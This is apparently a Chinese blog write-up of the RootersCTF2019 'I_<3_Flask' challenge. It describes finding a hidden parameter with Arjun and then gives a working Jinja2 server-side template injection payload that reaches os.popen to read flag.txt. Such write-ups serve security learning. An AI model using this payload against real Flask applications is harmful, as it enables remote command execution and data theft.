[RootersCTF2019]I_<3_Flask

题目考点

首先题目的名称就是Flask,那么这个题目就可能是考的Flask的模板注入(SSTI)

主要的难点还是在找到参数

查找参数

这里可以利用Arjun这个HTTP参数发现工具查询传递的参数

image-20220228155921838

SSTI

然后进行一个简单的SSTI

?name={{%27%27.__class__.__base__.__subclasses__()[222].__init__.__globals__["os"].popen(%27cat%20flag.txt%27).read()}}

image-20220228160103047

注:其中找到利用函数的位置可以通过脚本定位

posted @   Townmacro  阅读(184)  评论(0编辑  收藏  举报
相关博文:
·  [SUCTF 2019]EasySQL
·  [极客大挑战 2019]EasySQL
·  [RootersCTF2019]I_<3_Flask 1
·  [BUUCTF题解][RootersCTF2019]I_3_Flask
·  [RootersCTF2019]I_<3_Flask-1|SSTI注入
阅读排行:
· 25岁的心里话
· 闲置电脑爆改个人服务器(超详细) #公网映射 #Vmware虚拟网络编辑器
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 零经验选手,Compose 一天开发一款小游戏!
· 一起来玩mcp_server_sqlite,让AI帮你做增删改查!!
点击右上角即可分享
微信分享提示